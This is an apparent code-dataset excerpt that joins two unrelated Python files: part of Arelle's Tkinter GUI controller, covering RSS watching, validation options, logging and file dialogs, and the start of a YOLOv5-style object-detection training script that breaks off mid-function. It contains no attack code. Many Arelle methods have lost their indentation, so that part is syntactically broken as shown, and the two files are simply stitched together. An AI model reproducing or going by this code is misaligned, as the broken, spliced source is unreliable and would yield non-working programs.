                                _("RSS Feed is not set up, please select options and select feed"),
                                parent=self.parent)
            return False
        rssModelXbrl = None
        for loadedModelXbrl in self.modelManager.loadedModelXbrls:
            if (loadedModelXbrl.modelDocument.type == Type.RSSFEED and
                loadedModelXbrl.modelDocument.uri == self.modelManager.rssWatchOptions.get("feedSourceUri")):
                rssModelXbrl = loadedModelXbrl
                break
        #not loaded
        if start:
            if not rssModelXbrl:
                rssModelXbrl = self.modelManager.create(Type.RSSFEED, self.modelManager.rssWatchOptions.get("feedSourceUri"))
                self.showLoadedXbrl(rssModelXbrl, False)
            if not hasattr(rssModelXbrl,"watchRss"):
                WatchRss.initializeWatcher(rssModelXbrl)
            rssModelXbrl.watchRss.start()
        elif stop:
            if rssModelXbrl and rssModelXbrl.watchRss:
                rssModelXbrl.watchRss.stop()
# for ui thread option updating
def rssWatchUpdateOption(self, latestPubDate=None):
self.uiThreadQueue.put((self.uiRssWatchUpdateOption, [latestPubDate]))
# ui thread addToLog
def uiRssWatchUpdateOption(self, latestPubDate):
if latestPubDate:
self.modelManager.rssWatchOptions["latestPubDate"] = latestPubDate
self.config["rssWatchOptions"] = self.modelManager.rssWatchOptions
self.saveConfig()
    def languagesDialog(self, *args):
        """Prompt for a label-language override; apply it, reload views, and persist.

        An empty entry reverts to the system default language.
        """
        override = self.lang if self.lang != self.modelManager.defaultLang else ""
        import tkinter.simpledialog
        newValue = tkinter.simpledialog.askstring(_("arelle - Labels language code setting"),
                _("The system default language is: {0} \n\n"
                  "You may override with a different language for labels display. \n\n"
                  "Current language override code: {1} \n"
                  "(Leave empty to use the system default language.)").format(
                self.modelManager.defaultLang, override),
                parent=self.parent)
        if newValue is not None:
            self.config["labelLangOverride"] = newValue
            if newValue:
                self.lang = newValue
            else:
                self.lang = self.modelManager.defaultLang
            if self.modelManager.modelXbrl and self.modelManager.modelXbrl.modelDocument:
                self.showLoadedXbrl(self.modelManager.modelXbrl, True) # reload views
            self.saveConfig()
    def setValidateTooltipText(self):
        """Rebuild the Validate toolbar button's tooltip from the current validation options.

        Describes what would be validated (DTS/instance/versioning report) and
        which optional checks (calculations, UTR, disclosure system) apply.
        """
        if self.modelManager.modelXbrl and not self.modelManager.modelXbrl.isClosed and self.modelManager.modelXbrl.modelDocument is not None:
            valType = self.modelManager.modelXbrl.modelDocument.type
            if valType in (ModelDocument.Type.SCHEMA, ModelDocument.Type.LINKBASE):
                valName = "DTS"
            else:
                valName = ModelDocument.Type.typeName[valType]
            if valType == ModelDocument.Type.VERSIONINGREPORT:
                v = _("Validate versioning report")
            else:
                if self.modelManager.validateCalcLB:
                    if self.modelManager.validateInferDecimals:
                        c = _("\nCheck calculations (infer decimals)")
                    else:
                        c = _("\nCheck calculations (infer precision)")
                else:
                    c = ""
                if self.modelManager.validateUtr:
                    u = _("\nCheck unit type registry")
                else:
                    u = ""
                if self.modelManager.validateDisclosureSystem:
                    v = _("Validate {0}\nCheck disclosure system rules\n{1}{2}{3}").format(
                          valName, self.modelManager.disclosureSystem.selection,c,u)
                else:
                    v = _("Validate {0}{1}{2}").format(valName, c, u)
        else:
            v = _("Validate")
        self.validateTooltipText.set(v)
def setValidateCalcLB(self, *args):
self.modelManager.validateCalcLB = self.validateCalcLB.get()
self.config["validateCalcLB"] = self.modelManager.validateCalcLB
self.saveConfig()
self.setValidateTooltipText()
def setValidateInferDecimals(self, *args):
self.modelManager.validateInferDecimals = self.validateInferDecimals.get()
self.config["validateInferDecimals"] = self.modelManager.validateInferDecimals
self.saveConfig()
self.setValidateTooltipText()
def setValidateUtr(self, *args):
self.modelManager.validateUtr = self.validateUtr.get()
self.config["validateUtr"] = self.modelManager.validateUtr
self.saveConfig()
self.setValidateTooltipText()
def setCollectProfileStats(self, *args):
self.modelManager.collectProfileStats = self.collectProfileStats.get()
self.config["collectProfileStats"] = self.modelManager.collectProfileStats
self.saveConfig()
    def find(self, *args):
        """Show the Find dialog."""
        from arelle.DialogFind import find
        find(self)
    def helpAbout(self, event=None):
        """Show the About dialog with version, license, and bundled-library credits."""
        from arelle import DialogAbout, Version
        from lxml import etree
        DialogAbout.about(self.parent,
                          _("About arelle"),
                          os.path.join(self.imagesDir, "arelle32.gif"),
                          _("arelle\u00ae {0} {1}bit {2}\n"
                            "An open source XBRL platform\n"
                            "\u00a9 2010-2015 Mark V Systems Limited\n"
                            "All rights reserved\nhttp://www.arelle.org\nsupport@arelle.org\n\n"
                            "Licensed under the Apache License, Version 2.0 (the \"License\"); "
                            "you may not use this file except in compliance with the License. "
                            "You may obtain a copy of the License at\n\n"
                            "http://www.apache.org/licenses/LICENSE-2.0\n\n"
                            "Unless required by applicable law or agreed to in writing, software "
                            "distributed under the License is distributed on an \"AS IS\" BASIS, "
                            "WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. "
                            "See the License for the specific language governing permissions and "
                            "limitations under the License."
                            "\n\nIncludes:"
                            "\n   Python\u00ae {4[0]}.{4[1]}.{4[2]} \u00a9 2001-2013 Python Software Foundation"
                            "\n   PyParsing \u00a9 2003-2013 Paul T. McGuire"
                            "\n   lxml {5[0]}.{5[1]}.{5[2]} \u00a9 2004 Infrae, ElementTree \u00a9 1999-2004 by Fredrik Lundh"
                            "\n   xlrd \u00a9 2005-2013 Stephen J. Machin, Lingfo Pty Ltd, \u00a9 2001 D. Giffin, \u00a9 2000 A. Khan"
                            "\n   xlwt \u00a9 2007 Stephen J. Machin, Lingfo Pty Ltd, \u00a9 2005 R. V. Kiseliov"
                            "{3}"
                            )
                          .format(self.__version__, self.systemWordSize, Version.version,
                                  _("\n   Bottle \u00a9 2011-2013 Marcel Hellkamp") if self.hasWebServer else "",
                                  sys.version_info, etree.LXML_VERSION))
# worker threads addToLog
def addToLog(self, message, messageCode="", messageArgs=None, file="", level=logging.INFO):
if messageCode and messageCode not in message: # prepend message code
message = "[{}] {}".format(messageCode, message)
if file:
if isinstance(file, (tuple,list,set)):
message += " - " + ", ".join(file)
elif isinstance(file, _STR_BASE):
message += " - " + file
if isinstance(messageArgs, dict):
message = message % messageArgs
if self.testMode:
self.uiAddToLog(message)
else:
self.uiThreadQueue.put((self.uiAddToLog, [message]))
# ui thread addToLog
def uiAddToLog(self, message):
try:
self.logView.append(message)
except:
pass
    def logClear(self, *ignore):
        """Clear the message log pane."""
        self.logView.clear()
    def logSelect(self, *ignore):
        """Bring the message log pane to the front."""
        self.logView.select()
def logSaveToFile(self, *ignore):
filename = self.uiFileDialog("save",
title=_("arelle - Save Messages Log"),
initialdir=".",
filetypes=[(_("Txt file"), "*.txt")],
defaultextension=".txt")
if not filename:
return False
try:
self.logView.saveToFile(filename)
except (IOError, EnvironmentError) as err:
tkinter.messagebox.showwarning(_("arelle - Error"),
_("Failed to save {0}:\n{1}").format(
filename, err),
parent=self.parent)
return True;
# worker threads viewModelObject
def viewModelObject(self, modelXbrl, objectId):
self.waitForUiThreadQueue() # force prior ui view updates if any
self.uiThreadQueue.put((self.uiViewModelObject, [modelXbrl, objectId]))
# ui thread viewModelObject
def uiViewModelObject(self, modelXbrl, objectId):
modelXbrl.viewModelObject(objectId)
# worker threads viewModelObject
def reloadViews(self, modelXbrl):
self.uiThreadQueue.put((self.uiReloadViews, [modelXbrl]))
# ui thread viewModelObject
def uiReloadViews(self, modelXbrl):
for view in modelXbrl.views:
view.view()
# worker threads viewModelObject
def reloadTableView(self, modelXbrl):
self.uiThreadQueue.put((self.uiReloadTableView, [modelXbrl]))
# ui thread viewModelObject
def uiReloadTableView(self, modelXbrl):
for view in modelXbrl.views:
if isinstance(view, ViewWinRenderedGrid.ViewRenderedGrid):
view.view()
# worker threads showStatus
def showStatus(self, message, clearAfter=None):
if self.testMode:
self.uiShowStatus(message, clearAfter)
else:
self.uiThreadQueue.put((self.uiShowStatus, [message, clearAfter]))
# ui thread showStatus
def uiClearStatusTimerEvent(self):
if self.statusbarTimerId: # if timer still wanted, clear status
self.statusbar["text"] = ""
self.statusbarTimerId = None
    def uiShowStatus(self, message, clearAfter=None):
        """Set the status bar text (UI thread); schedule auto-clear when clearAfter > 0 ms."""
        if self.statusbarTimerId: # ignore timer
            self.statusbarTimerId = None
        self.statusbar["text"] = message
        if clearAfter is not None and clearAfter > 0:
            self.statusbarTimerId  = self.statusbar.after(clearAfter, self.uiClearStatusTimerEvent)
# web authentication password request
def internet_user_password(self, host, realm):
from arelle.DialogUserPassword import askUserPassword
untilDone = threading.Event()
result = []
self.uiThreadQueue.put((askUserPassword, [self.parent, host, realm, untilDone, result]))
untilDone.wait()
return result[0]
# web file login requested
def internet_logon(self, url, quotedUrl, dialogCaption, dialogText):
from arelle.DialogUserPassword import askInternetLogon
untilDone = threading.Event()
result = []
self.uiThreadQueue.put((askInternetLogon, [self.parent, url, quotedUrl, dialogCaption, dialogText, untilDone, result]))
untilDone.wait()
return result[0]
def waitForUiThreadQueue(self):
for i in range(40): # max 2 secs
if self.uiThreadQueue.empty():
break
time.sleep(0.05)
    def uiThreadChecker(self, widget, delayMsecs=100):    # 10x per second
        """Drain the UI callback queue on the main thread, then reschedule itself via after()."""
        # process callback on main (UI) thread
        while not self.uiThreadQueue.empty():
            try:
                (callback, args) = self.uiThreadQueue.get(block=False)
            except queue.Empty:
                pass
            else:
                callback(*args)
        widget.after(delayMsecs, lambda: self.uiThreadChecker(widget))
    def uiFileDialog(self, action, title=None, initialdir=None, filetypes=[], defaultextension=None, owner=None, multiple=False, parent=None, initialfile=None):
        """Show a platform-appropriate open/save file dialog and return the chosen name(s).

        action is "open" or "save".  With multiple=True (open only) returns a
        list of names.  Uses win32gui when available, otherwise tkinter's
        dialogs; on Mac the filetypes filter is suppressed.
        NOTE: the mutable default filetypes=[] is never mutated here, so it is
        harmless, but avoid copying this pattern.
        """
        if parent is None: parent = self.parent
        if multiple and action == "open":  # return as simple list of file names
            multFileNames = tkinter.filedialog.askopenfilename(
                                multiple=True,
                                title=title,
                                initialdir=initialdir,
                                filetypes=[] if self.isMac else filetypes,
                                defaultextension=defaultextension,
                                parent=parent,
                                initialfile=initialfile)
            if self.isMac:
                return multFileNames
            return re.findall("[{]([^}]+)[}]",  # multiple returns "{file1} {file2}..."
                              multFileNames)
        elif self.hasWin32gui:
            import win32gui
            try:
                filename, filter, flags = {"open":win32gui.GetOpenFileNameW,
                                           "save":win32gui.GetSaveFileNameW}[action](
                            hwndOwner=(owner if owner else parent).winfo_id(),
                            hInstance=win32gui.GetModuleHandle(None),
                            Filter='\0'.join(e for t in filetypes+['\0'] for e in t),
                            MaxFile=4096,
                            InitialDir=initialdir,
                            Title=title,
                            DefExt=defaultextension,
                            File=initialfile)
                return filename
            except win32gui.error:
                return ''
        else:
            return {"open":tkinter.filedialog.askopenfilename,
                    "save":tkinter.filedialog.asksaveasfilename}[action](
                            title=title,
                            initialdir=initialdir,
                            filetypes=[] if self.isMac else filetypes,
                            defaultextension=defaultextension,
                            parent=parent,
                            initialfile=initialfile)
def setTestMode(self, testMode):
self.testMode = testMode
def showMessage(self, message):
tkinter.messagebox.showwarning(_("arelle - Error"), message, parent=self.parent)
from arelle import (DialogFormulaParameters, DialogActiveFormula)
class WinMainLogHandler(logging.Handler):
    """logging.Handler that routes formatted log records into the GUI log pane.

    Each emitted record is formatted with Cntlr.LogFormatter and appended to
    the controller's log view via cntlr.addToLog().
    """
    def __init__(self, cntlr):
        super(WinMainLogHandler, self).__init__()
        self.cntlr = cntlr
        #formatter = logging.Formatter("%(asctime)s - %(name)s - %(levelname)s - %(message)s - %(file)s %(sourceLine)s")
        formatter = Cntlr.LogFormatter("[%(messageCode)s] %(message)s - %(file)s")
        self.setFormatter(formatter)
    def flush(self):
        ''' Nothing to flush '''
    def emit(self, logRecord):
        # add to logView
        msg = self.format(logRecord)
        try:
            self.cntlr.addToLog(msg)
        except Exception:
            # GUI pane may already be torn down (e.g. during shutdown); a log
            # handler must never propagate.  Was a bare "except:", which also
            # swallowed KeyboardInterrupt/SystemExit -- narrowed to Exception.
            pass
class TkinterCallWrapper:
    """Replacement for internal tkinter class. Stores function to call when some user
    defined Tcl function is called e.g. after an event occurred."""
    def __init__(self, func, subst, widget):
        """Store FUNC, SUBST and WIDGET as members."""
        self.func = func
        self.subst = subst
        self.widget = widget
    def __call__(self, *args):
        """Apply first function SUBST to arguments, than FUNC."""
        try:
            callArgs = self.subst(*args) if self.subst else args
            return self.func(*callArgs)
        except SystemExit as msg:
            raise SystemExit(msg)
        except Exception:
            # tkinter's stock wrapper calls widget._report_exception(); here we
            # surface the formatted traceback in an error dialog instead
            excType, excValue, excTraceback = sys.exc_info()
            msg = ''.join(traceback.format_exception_only(excType, excValue))
            tracebk = ''.join(traceback.format_tb(excTraceback, limit=7))
            tkinter.messagebox.showerror(_("Exception"),
                                         _("{0}\nCall trace\n{1}").format(msg, tracebk))
def main():
    # this is the entry called by arelleGUI.pyw for windows
    """Create the Tk root and GUI controller and run the event loop.

    Loops while the module-level flag ``restartMain`` is set, so the GUI can
    request a full restart by setting it and exiting the mainloop.
    """
    global restartMain, readCommandLineArguments
    while restartMain:
        restartMain = False
        application = Tk()
        cntlrWinMain = CntlrWinMain(application)
        application.protocol("WM_DELETE_WINDOW", cntlrWinMain.quit)
        if sys.platform == "darwin" and not __file__.endswith(".app/Contents/MacOS/arelle"):
            # not built app - launches behind python or eclipse
            # force the window frontmost, then reset -topmost from the UI queue
            application.lift()
            application.call('wm', 'attributes', '.', '-topmost', True)
            cntlrWinMain.uiThreadQueue.put((application.call, ['wm', 'attributes', '.', '-topmost', False]))
            os.system('''/usr/bin/osascript -e 'tell app "Finder" to set frontmost of process "Python" to true' ''')
        if readCommandLineArguments:
            # only honored on the first pass; a restart keeps prior state
            readCommandLineArguments = False
            if len(sys.argv)>1:
                fileName = sys.argv[1]
                # open a readable+writable .xbrl file given on the command line
                if os.path.isfile(fileName) and fileName.endswith('.xbrl') and os.access(fileName, os.R_OK) and os.access(fileName, os.W_OK):
                    cntlrWinMain.uiThreadQueue.put((cntlrWinMain.fileOpenFile, [fileName]))
        application.mainloop()
if __name__ == "__main__":
# this is the entry called by MacOS open and MacOS shell scripts
# check if ARELLE_ARGS are used to emulate command line operation
if os.getenv("ARELLE_ARGS"):
# command line mode
from arelle import CntlrCmdLine
CntlrCmdLine.main()
else:
# GUI mode
main()
|
train.py
|
import argparse
import logging
import math
import os
import random
import time
from copy import deepcopy
from pathlib import Path
from threading import Thread
import numpy as np
import torch.distributed as dist
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import torch.optim.lr_scheduler as lr_scheduler
import torch.utils.data
import yaml
from torch.cuda import amp
from torch.nn.parallel import DistributedDataParallel as DDP
from torch.utils.tensorboard import SummaryWriter
from tqdm import tqdm
import test # import test.py to get mAP after each epoch
from models.experimental import attempt_load
from models.yolo import Model
from utils.autoanchor import check_anchors
from utils.datasets import create_dataloader
from utils.general import (
labels_to_class_weights,
increment_path,
labels_to_image_weights,
init_seeds,
fitness,
strip_optimizer,
get_latest_run,
check_dataset,
check_file,
check_git_status,
check_img_size,
check_requirements,
print_mutation,
set_logging,
one_cycle,
colorstr,
)
from utils.google_utils import attempt_download
from utils.loss import ComputeLoss
from utils.plots import plot_images, plot_labels, plot_results, plot_evolution
from utils.torch_utils import (
ModelEMA,
select_device,
intersect_dicts,
torch_distributed_zero_first,
is_parallel,
)
from utils.wandb_logging.wandb_utils import WandbLogger, resume_and_get_id
logger = logging.getLogger(__name__)
def train(hyp, opt, device, tb_writer=None):
    """Run the full YOLOv5-style training loop.

    Args:
        hyp: dict of hyperparameters (lr0, momentum, loss gains, augmentation, ...).
            Mutated in place (weight_decay / box / cls / obj are rescaled).
        opt: argparse.Namespace of options; must provide save_dir, epochs,
            batch_size, total_batch_size, weights and global_rank (and the
            flags referenced below).
        device: torch.device to train on.
        tb_writer: optional TensorBoard SummaryWriter (rank -1/0 only).

    Returns:
        tuple of final metrics (P, R, mAP@.5, mAP@.5:.95, val_box, val_obj, val_cls).

    Fixes vs. prior revision:
      * ``del ckpt, state_dict`` ran unconditionally -> NameError when training
        from scratch (names only bound on the pretrained path); now guarded.
      * final COCO speed/mAP loop iterated ``(last)`` (a bare Path, not a
        tuple) when best.pt was absent -> TypeError; now ``(last,)``.
    """
    logger.info(colorstr("hyperparameters: ") + ", ".join(f"{k}={v}" for k, v in hyp.items()))
    save_dir, epochs, batch_size, total_batch_size, weights, rank = (
        Path(opt.save_dir),
        opt.epochs,
        opt.batch_size,
        opt.total_batch_size,
        opt.weights,
        opt.global_rank,
    )

    # Directories
    wdir = save_dir / "weights"
    wdir.mkdir(parents=True, exist_ok=True)  # make dir
    last = wdir / "last.pt"
    best = wdir / "best.pt"
    results_file = save_dir / "results.txt"

    # Save run settings
    with open(save_dir / "hyp.yaml", "w") as f:
        yaml.dump(hyp, f, sort_keys=False)
    with open(save_dir / "opt.yaml", "w") as f:
        yaml.dump(vars(opt), f, sort_keys=False)

    # Configure
    plots = not opt.evolve  # create plots
    cuda = device.type != "cpu"
    init_seeds(2 + rank)
    with open(opt.data) as f:
        data_dict = yaml.load(f, Loader=yaml.SafeLoader)  # data dict
    is_coco = opt.data.endswith("coco.yaml")

    # Logging - doing this before checking the dataset; might update data_dict
    loggers = {"wandb": None}  # loggers dict
    if rank in [-1, 0]:
        opt.hyp = hyp  # add hyperparameters
        run_id = (
            torch.load(weights).get("wandb_id")
            if weights.endswith(".pt") and os.path.isfile(weights)
            else None
        )
        wandb_logger = WandbLogger(opt, Path(opt.save_dir).stem, run_id, data_dict)
        loggers["wandb"] = wandb_logger.wandb
        data_dict = wandb_logger.data_dict
        if wandb_logger.wandb:
            # WandbLogger might update weights, epochs if resuming
            weights, epochs, hyp = opt.weights, opt.epochs, opt.hyp

    nc = 1 if opt.single_cls else int(data_dict["nc"])  # number of classes
    names = (
        ["item"]
        if opt.single_cls and len(data_dict["names"]) != 1
        else data_dict["names"]
    )  # class names
    assert len(names) == nc, "%g names found for nc=%g dataset in %s" % (len(names), nc, opt.data)  # check

    # Model
    pretrained = weights.endswith(".pt")
    if pretrained:
        with torch_distributed_zero_first(rank):
            attempt_download(weights)  # download if not found locally
        ckpt = torch.load(weights, map_location=device)  # load checkpoint
        model = Model(opt.cfg or ckpt["model"].yaml, ch=3, nc=nc, anchors=hyp.get("anchors")).to(device)  # create
        exclude = ["anchor"] if (opt.cfg or hyp.get("anchors")) and not opt.resume else []  # exclude keys
        state_dict = ckpt["model"].float().state_dict()  # to FP32
        state_dict = intersect_dicts(state_dict, model.state_dict(), exclude=exclude)  # intersect
        model.load_state_dict(state_dict, strict=False)  # load
        logger.info("Transferred %g/%g items from %s" % (len(state_dict), len(model.state_dict()), weights))  # report
    else:
        model = Model(opt.cfg, ch=3, nc=nc, anchors=hyp.get("anchors")).to(device)  # create
    with torch_distributed_zero_first(rank):
        check_dataset(data_dict)  # check
    train_path = data_dict["train"]
    test_path = data_dict["val"]

    # Freeze
    freeze = []  # parameter names to freeze (full or partial)
    for k, v in model.named_parameters():
        v.requires_grad = True  # train all layers
        if any(x in k for x in freeze):
            print("freezing %s" % k)
            v.requires_grad = False

    # Optimizer
    nbs = 64  # nominal batch size
    accumulate = max(round(nbs / total_batch_size), 1)  # accumulate loss before optimizing
    hyp["weight_decay"] *= total_batch_size * accumulate / nbs  # scale weight_decay
    logger.info(f"Scaled weight_decay = {hyp['weight_decay']}")

    pg0, pg1, pg2 = [], [], []  # optimizer parameter groups
    for k, v in model.named_modules():
        if hasattr(v, "bias") and isinstance(v.bias, nn.Parameter):
            pg2.append(v.bias)  # biases
        if isinstance(v, nn.BatchNorm2d):
            pg0.append(v.weight)  # no decay
        elif hasattr(v, "weight") and isinstance(v.weight, nn.Parameter):
            pg1.append(v.weight)  # apply decay

    if opt.adam:
        optimizer = optim.Adam(pg0, lr=hyp["lr0"], betas=(hyp["momentum"], 0.999))  # adjust beta1 to momentum
    else:
        optimizer = optim.SGD(pg0, lr=hyp["lr0"], momentum=hyp["momentum"], nesterov=True)
    optimizer.add_param_group({"params": pg1, "weight_decay": hyp["weight_decay"]})  # add pg1 with weight_decay
    optimizer.add_param_group({"params": pg2})  # add pg2 (biases)
    logger.info("Optimizer groups: %g .bias, %g conv.weight, %g other" % (len(pg2), len(pg1), len(pg0)))
    del pg0, pg1, pg2

    # Scheduler https://arxiv.org/pdf/1812.01187.pdf
    # https://pytorch.org/docs/stable/_modules/torch/optim/lr_scheduler.html#OneCycleLR
    if opt.linear_lr:
        lf = lambda x: (1 - x / (epochs - 1)) * (1.0 - hyp["lrf"]) + hyp["lrf"]  # linear
    else:
        lf = one_cycle(1, hyp["lrf"], epochs)  # cosine 1->hyp['lrf']
    scheduler = lr_scheduler.LambdaLR(optimizer, lr_lambda=lf)

    # EMA
    ema = ModelEMA(model) if rank in [-1, 0] else None

    # Resume
    start_epoch, best_fitness = 0, 0.0
    # FIXME: optimizer/EMA/epoch state is deliberately NOT restored from the
    # checkpoint in this revision (resume-from-checkpoint disabled upstream).
    print("\n\n Not loading optimizer!!!!!")
    if pretrained:
        # ckpt / state_dict only exist on the pretrained path; deleting them
        # unconditionally raised NameError when training from scratch
        del ckpt, state_dict

    # Image sizes
    gs = max(int(model.stride.max()), 32)  # grid size (max stride)
    nl = model.model[-1].nl  # number of detection layers (used for scaling hyp['obj'])
    imgsz, imgsz_test = [check_img_size(x, gs) for x in opt.img_size]  # verify imgsz are gs-multiples

    # DP mode
    if cuda and rank == -1 and torch.cuda.device_count() > 1:
        model = torch.nn.DataParallel(model)

    # SyncBatchNorm
    if opt.sync_bn and cuda and rank != -1:
        model = torch.nn.SyncBatchNorm.convert_sync_batchnorm(model).to(device)
        logger.info("Using SyncBatchNorm()")

    # Trainloader
    dataloader, dataset = create_dataloader(
        train_path,
        imgsz,
        batch_size,
        gs,
        opt,
        hyp=hyp,
        augment=True,
        cache=opt.cache_images,
        rect=opt.rect,
        rank=rank,
        world_size=opt.world_size,
        workers=opt.workers,
        image_weights=opt.image_weights,
        quad=opt.quad,
        prefix=colorstr("train: "),
    )
    mlc = np.concatenate(dataset.labels, 0)[:, 0].max()  # max label class
    nb = len(dataloader)  # number of batches
    assert mlc < nc, "Label class %g exceeds nc=%g in %s. Possible class labels are 0-%g" % (mlc, nc, opt.data, nc - 1)

    # Process 0
    if rank in [-1, 0]:
        testloader = create_dataloader(
            test_path,
            imgsz_test,
            batch_size * 2,
            gs,
            opt,  # testloader
            hyp=hyp,
            cache=opt.cache_images and not opt.notest,
            rect=True,
            rank=-1,
            world_size=opt.world_size,
            workers=opt.workers,
            pad=0.5,
            prefix=colorstr("val: "),
        )[0]
        if not opt.resume:
            labels = np.concatenate(dataset.labels, 0)
            c = torch.tensor(labels[:, 0])  # classes
            if plots:
                plot_labels(labels, names, save_dir, loggers)
                if tb_writer:
                    tb_writer.add_histogram("classes", c, 0)
            # Anchors
            if not opt.noautoanchor:
                check_anchors(dataset, model=model, thr=hyp["anchor_t"], imgsz=imgsz)
            model.half().float()  # pre-reduce anchor precision

    # DDP mode
    if cuda and rank != -1:
        model = DDP(model, device_ids=[opt.local_rank], output_device=opt.local_rank)

    # Model parameters
    hyp["box"] *= 3.0 / nl  # scale to layers
    hyp["cls"] *= nc / 80.0 * 3.0 / nl  # scale to classes and layers
    hyp["obj"] *= (imgsz / 640) ** 2 * 3.0 / nl  # scale to image size and layers
    model.nc = nc  # attach number of classes to model
    model.hyp = hyp  # attach hyperparameters to model
    model.gr = 1.0  # iou loss ratio (obj_loss = 1.0 or iou)
    model.class_weights = labels_to_class_weights(dataset.labels, nc).to(device) * nc  # attach class weights
    model.names = names

    # Start training
    t0 = time.time()
    nw = max(round(hyp["warmup_epochs"] * nb), 1000)  # number of warmup iterations, max(3 epochs, 1k iterations)
    maps = np.zeros(nc)  # mAP per class
    results = (0, 0, 0, 0, 0, 0, 0)  # P, R, mAP@.5, mAP@.5-.95, val_loss(box, obj, cls)
    scheduler.last_epoch = start_epoch - 1  # do not move
    scaler = amp.GradScaler(enabled=cuda)
    compute_loss = ComputeLoss(model)  # init loss class
    logger.info(
        f"Image sizes {imgsz} train, {imgsz_test} test\n"
        f"Using {dataloader.num_workers} dataloader workers\n"
        f"Logging results to {save_dir}\n"
        f"Starting training for {epochs} epochs..."
    )
    for epoch in range(start_epoch, epochs):  # epoch ----------------------------------------------------------
        model.train()

        # Update image weights (optional)
        if opt.image_weights:
            # Generate indices
            if rank in [-1, 0]:
                cw = model.class_weights.cpu().numpy() * (1 - maps) ** 2 / nc  # class weights
                iw = labels_to_image_weights(dataset.labels, nc=nc, class_weights=cw)  # image weights
                dataset.indices = random.choices(range(dataset.n), weights=iw, k=dataset.n)  # rand weighted idx
            # Broadcast if DDP
            if rank != -1:
                indices = (torch.tensor(dataset.indices) if rank == 0 else torch.zeros(dataset.n)).int()
                dist.broadcast(indices, 0)
                if rank != 0:
                    dataset.indices = indices.cpu().numpy()

        mloss = torch.zeros(4, device=device)  # mean losses
        if rank != -1:
            dataloader.sampler.set_epoch(epoch)
        pbar = enumerate(dataloader)
        logger.info(("\n" + "%10s" * 8) % ("Epoch", "gpu_mem", "box", "obj", "cls", "total", "labels", "img_size"))
        if rank in [-1, 0]:
            pbar = tqdm(pbar, total=nb)  # progress bar
        optimizer.zero_grad()
        for i, (imgs, targets, paths, _) in pbar:  # batch -----------------------------------------------------
            ni = i + nb * epoch  # number integrated batches (since train start)
            imgs = imgs.to(device, non_blocking=True).float() / 255.0  # uint8 to float32, 0-255 to 0.0-1.0

            # Warmup
            if ni <= nw:
                xi = [0, nw]  # x interp
                accumulate = max(1, np.interp(ni, xi, [1, nbs / total_batch_size]).round())
                for j, x in enumerate(optimizer.param_groups):
                    # bias lr falls from 0.1 to lr0, all other lrs rise from 0.0 to lr0
                    x["lr"] = np.interp(ni, xi, [hyp["warmup_bias_lr"] if j == 2 else 0.0, x["initial_lr"] * lf(epoch)])
                    if "momentum" in x:
                        x["momentum"] = np.interp(ni, xi, [hyp["warmup_momentum"], hyp["momentum"]])

            # Multi-scale
            if opt.multi_scale:
                sz = random.randrange(imgsz * 0.5, imgsz * 1.5 + gs) // gs * gs  # size
                sf = sz / max(imgs.shape[2:])  # scale factor
                if sf != 1:
                    ns = [math.ceil(x * sf / gs) * gs for x in imgs.shape[2:]]  # new shape (stretched to gs-multiple)
                    imgs = F.interpolate(imgs, size=ns, mode="bilinear", align_corners=False)

            # Forward
            with amp.autocast(enabled=cuda):
                pred = model(imgs)  # forward
                loss, loss_items = compute_loss(pred, targets.to(device))  # loss scaled by batch_size
                if rank != -1:
                    loss *= opt.world_size  # gradient averaged between devices in DDP mode
                if opt.quad:
                    loss *= 4.0

            # Backward
            scaler.scale(loss).backward()

            # Optimize
            if ni % accumulate == 0:
                scaler.step(optimizer)  # optimizer.step
                scaler.update()
                optimizer.zero_grad()
                if ema:
                    ema.update(model)

            # Print
            if rank in [-1, 0]:
                mloss = (mloss * i + loss_items) / (i + 1)  # update mean losses
                mem = "%.3gG" % (torch.cuda.memory_reserved() / 1e9 if torch.cuda.is_available() else 0)  # (GB)
                s = ("%10s" * 2 + "%10.4g" * 6) % (
                    "%g/%g" % (epoch, epochs - 1),
                    mem,
                    *mloss,
                    targets.shape[0],
                    imgs.shape[-1],
                )
                pbar.set_description(s)

                # Plot
                if plots and ni < 3:
                    f = save_dir / f"train_batch{ni}.jpg"  # filename
                    Thread(target=plot_images, args=(imgs, targets, paths, f), daemon=True).start()
                elif plots and ni == 10 and wandb_logger.wandb:
                    wandb_logger.log(
                        {
                            "Mosaics": [
                                wandb_logger.wandb.Image(str(x), caption=x.name)
                                for x in save_dir.glob("train*.jpg")
                                if x.exists()
                            ]
                        }
                    )
            # end batch --------------------------------------------------------------------------------------

        # Scheduler
        lr = [x["lr"] for x in optimizer.param_groups]  # for tensorboard
        scheduler.step()

        # DDP process 0 or single-GPU
        if rank in [-1, 0]:
            # mAP
            ema.update_attr(model, include=["yaml", "nc", "hyp", "gr", "names", "stride", "class_weights"])
            final_epoch = epoch + 1 == epochs
            if not opt.notest or final_epoch:  # Calculate mAP
                wandb_logger.current_epoch = epoch + 1
                results, maps, times = test.test(
                    data_dict,
                    batch_size=batch_size * 2,
                    imgsz=imgsz_test,
                    model=ema.ema,
                    single_cls=opt.single_cls,
                    dataloader=testloader,
                    save_dir=save_dir,
                    verbose=nc < 50 and final_epoch,
                    plots=plots and final_epoch,
                    wandb_logger=wandb_logger,
                    compute_loss=compute_loss,
                    is_coco=is_coco,
                )

            # Write
            with open(results_file, "a") as f:
                f.write(s + "%10.4g" * 7 % results + "\n")  # append metrics, val_loss
            if len(opt.name) and opt.bucket:
                os.system("gsutil cp %s gs://%s/results/results%s.txt" % (results_file, opt.bucket, opt.name))

            # Log
            tags = [
                "train/box_loss",
                "train/obj_loss",
                "train/cls_loss",  # train loss
                "metrics/precision",
                "metrics/recall",
                "metrics/mAP_0.5",
                "metrics/mAP_0.5:0.95",
                "val/box_loss",
                "val/obj_loss",
                "val/cls_loss",  # val loss
                "x/lr0",
                "x/lr1",
                "x/lr2",
            ]  # params
            for x, tag in zip(list(mloss[:-1]) + list(results) + lr, tags):
                if tb_writer:
                    tb_writer.add_scalar(tag, x, epoch)  # tensorboard
                if wandb_logger.wandb:
                    wandb_logger.log({tag: x})  # W&B

            # Update best mAP
            fi = fitness(np.array(results).reshape(1, -1))  # weighted combination of [P, R, mAP@.5, mAP@.5-.95]
            if fi > best_fitness:
                best_fitness = fi
            wandb_logger.end_epoch(best_result=best_fitness == fi)

            # Save model
            if (not opt.nosave) or (final_epoch and not opt.evolve):  # if save
                ckpt = {
                    "epoch": epoch,
                    "best_fitness": best_fitness,
                    "training_results": results_file.read_text(),
